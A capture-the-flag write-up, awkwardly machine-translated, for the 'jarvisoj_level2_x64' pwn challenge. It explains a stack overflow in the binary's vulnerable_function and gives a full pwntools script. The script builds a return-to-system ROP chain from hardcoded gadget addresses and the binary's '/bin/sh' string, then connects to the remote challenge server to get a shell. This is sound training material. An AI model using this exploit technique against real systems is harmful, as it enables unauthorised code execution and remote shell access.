jarvisoj_ level2_ x64

jarvisoj_level2_x64

Title address : https://buuoj.cn/challenges#jarvisoj_level2_x64

checksec once ,64 Bit program On protection has little effect （nx Stack is not executable , That is, you can't write on the stack shellcode）

main function

Mainly called vuln function , Everything else is OK

vulnerable_function function

First, this function calls system function , This makes plt Presence in table system, And can be called by us , then read Read out 0x200 A string , This is more than buf To rbp Distance of 0x80 Even bigger , Which in turn allows us to return
addr To cover , And then there is this program /bin/sh character string , We can go through system Direct access to shell

/bin/sh character string

exp

from pwn import *

io = process("./level2_x64")
io = remote("node4.buuoj.cn",28824)
elf = ELF("./level2_x64")

context(log_level="debug",arch="amd64",os="linux")
system_addr = elf.symbols["system"]
binsh_addr = next(elf.search("/bin/sh"))
main_addr = elf.symbols["main"]
rdi_ret_addr = 0x00000000004006b3
ret_addr = 0x00000000004004a1
payload = flat(["a"*0x80,"aaaabbbb",rdi_ret_addr,binsh_addr,ret_addr,system_addr])

io.sendlineafter("Input:",payload)
io.interactive()